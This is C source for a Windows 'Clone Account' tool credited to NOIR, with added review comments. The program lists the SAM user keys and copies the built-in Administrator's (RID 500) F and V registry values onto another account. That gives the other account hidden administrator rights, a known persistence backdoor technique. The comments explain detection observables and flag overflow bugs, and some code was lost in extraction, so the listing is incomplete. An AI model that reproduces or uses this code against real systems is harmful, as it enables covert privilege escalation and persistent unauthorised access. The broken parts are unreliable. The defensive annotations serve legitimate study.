//---------------------------------------------------------------------------
// Usage:
// After building, you must use regedt32 yourself to make the SAM key and its
// subkeys accessible to administrator before this program can be used.
//
// NOTE(review): what this listing does, from the visible code: Clone() reads
// the "F" and "V" registry values under
// HKLM\SAM\SAM\Domains\Account\Users\000001F4 and writes them over the same
// two values of a second account's key. 0x1F4 is RID 500, the built-in
// Administrator. Observables a defender can take from the code itself:
//   - an ACL change on HKLM\SAM\SAM granting Administrators access (the
//     precondition stated above; the default ACL does not allow it);
//   - KEY_ALL_ACCESS opens and RegSetValueEx writes on "F"/"V" under
//     ...\Account\Users\<RID> coming from an ordinary user-mode process.
// Registry auditing (a SACL on the SAM subtree) and comparing the "F" values
// of all accounts for duplicates are the usual checks - confirm against your
// own logging setup.
//---------------------------------------------------------------------------
// NOTE(review): both header names were lost when the page was extracted
// (the angle-bracket text is gone). The code calls Win32 registry functions
// and C stdio/string/stdlib functions - presumably windows.h and stdio.h.
#include
#include
// 50 rows of 30 bytes (1500 bytes in total, the size Open() zeroes).
char name[50][30];// these are used by the Open function
int openN=0;
#pragma hdrstop
//---------------------------------------------------------------------------
#pragma argsused
//---------------------------------------------------------------------------
// Open
// Open a key
//
// Opens HKEY_LOCAL_MACHINE\<set> and copies the names of its subkeys into
// the global name[] table, one subkey per row.
// NOTE(review): the end of this function is missing from the page (see the
// note before the second for loop).
//---------------------------------------------------------------------------
void Open(char *set)
{
    int i=0;
    HKEY hkey;
    DWORD dwlndex=0,cbname=100,ret=0;
    char temp[100],szBuff[100];
    FILETIME ftlastwt;
    ZeroMemory(szBuff,100);
    ZeroMemory(temp,100);
    ZeroMemory(name,1500);
    // NOTE(review): the result is not checked; if the open fails, hkey is
    // used uninitialised by the calls below.
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, set, 0, KEY_ALL_ACCESS, &hkey);
    // The loop stops on the first return code other than ERROR_SUCCESS.
    for( i=0 ; ret==ERROR_SUCCESS ; i++, dwlndex++ )
    {
        ret = RegEnumKeyEx( hkey, dwlndex, temp, &cbname, NULL, NULL, NULL, &ftlastwt );
        // NOTE(review): temp may hold up to 99 characters while each name[]
        // row is 30 bytes, and i is never compared with the 50 rows, so this
        // strcat can write past the table.
        strcat(name[i],temp);
        ZeroMemory(temp,100);
        // cbname is an in/out length for RegEnumKeyEx, so it is reset.
        cbname=100;
    }
    RegCloseKey(hkey);
    // NOTE(review): the page lost text between "openN" and the closing
    // quote below (most likely everything between a '<' and a '>'). The rest
    // of Open and the start of the next function are missing; the lines that
    // follow end in "return 1", so they belong to an int-returning function,
    // presumably the ListUser() that main() calls. szTemp and ViewType are
    // not declared anywhere in the visible text.
    for(openN=0;openN");
        printf("%s",szTemp);
        ViewType(szBuff);
        strcpy(szBuff,"SAM\\SAM\\Domains\\Account\\Users\\Names\\");
    }
    return 1;
}
//---------------------------------------------------------------------------
// Clone
// Clone an account
//
// Reads the "F" and "V" values of ...\Users\000001F4 into two heap buffers
// and writes them to the "F" and "V" values of the key named by the fixed
// prefix below plus the caller's text.
// user: text appended to the key-name prefix; its length is not checked.
// Returns 1 when both values were written, 0 on the first failing call.
// NOTE(review): every "return 0" path leaves the two malloc buffers
// allocated and the already-opened key handles open; the success path closes
// the handles but never frees the buffers.
//---------------------------------------------------------------------------
int Clone(char *user)
{
    HKEY hkeyRoot,hkeyUser;
    char CloneUserKey[100];
    // sizeF/sizeV start as the buffer capacities and are overwritten by
    // RegQueryValueEx with the number of bytes actually read.
    DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret;
    LPBYTE lpDataF,lpDataV;
    // NOTE(review): neither malloc result is checked before ZeroMemory.
    lpDataF = (LPBYTE) malloc(1024*2);
    lpDataV = (LPBYTE) malloc(1024*10);
    ZeroMemory(lpDataF,1024*2);
    ZeroMemory(lpDataV,1024*10);
    ZeroMemory(CloneUserKey,100);
    strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000");
    // NOTE(review): unbounded append into the 100-byte buffer.
    strcat(CloneUserKey,user);
    // Source key: RID 0x1F4 (500).
    ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F4", 0, KEY_ALL_ACCESS, &hkeyRoot);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("open key FAIL\n\r");
        return 0;
    }
    ret = RegQueryValueEx( hkeyRoot, // handle to key
        "F", // value name
        NULL, // reserved
        &Type, // type buffer
        lpDataF, // data buffer
        &sizeF // size of data buffer
        );
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("Query key FAIL\n\r");
        return 0;
    }
    ret = RegQueryValueEx( hkeyRoot, // handle to key
        "V", // value name
        NULL, // reserved
        &Type, // type buffer
        lpDataV, // data buffer
        &sizeV // size of data buffer
        );
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("Query key FAIL\n\r");
        return 0;
    }
    // Destination key, named by the string built above.
    ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE, CloneUserKey, 0, KEY_ALL_ACCESS, &hkeyUser);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("open key FAIL\n\r");
        return 0;
    }
    // These two writes are the modification a registry audit would record.
    ret= RegSetValueEx( hkeyUser, "F", 0, REG_BINARY, lpDataF, sizeF);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("set key FAIL\n\r");
        return 0;
    }
    ret= RegSetValueEx( hkeyUser, "V", 0, REG_BINARY, lpDataV, sizeV);
    if(ret==ERROR_SUCCESS) ;
    else
    {
        printf("set key FAIL\n\r");
        return 0;
    }
    // NOTE(review): the else branch here cannot run; a failure of the last
    // write has already returned above.
    if(ret==ERROR_SUCCESS) printf("clone SUCCESS\n\r");
    else
    {
        printf("clone FAIL\n\r");
        return 0;
    }
    RegCloseKey(hkeyRoot);
    RegCloseKey(hkeyUser);
    return 1;
}
//---------------------------------------------------------------------------
// main()
// Main calling function
//
// Interactive loop: reads a command line and dispatches "listuser",
// "clone<sep><text>" and "exit".
// NOTE(review): gets() has no length limit for the 20-byte command buffer,
// and the text after "clone" is copied with strcpy into a 5-byte buffer, so
// both copies can overflow the stack. With the bare input "clone",
// command+6 points one byte past the terminator and may read leftovers of an
// earlier command.
//---------------------------------------------------------------------------
int main()
{
    char command[20]={'\0'};
    char temp[5]={'\0'};
    printf("\n=*=Clone Account Ver0.01 Code By NOIR=*=\n\n");
    while(1)
    {
        printf("please enter the command:");
        gets(command);
        if( (strcmp(command,"listuser"))==0 ) ListUser();
        // Only the first five characters are compared; the sixth is skipped
        // as a separator without being checked.
        if( (strncmp(command,"clone",5))==0 )
        {
            strcpy(temp,command+6);
            Clone(temp);
        }
        if( (strcmp(command,"exit")==0) ) exit(0);
    }
}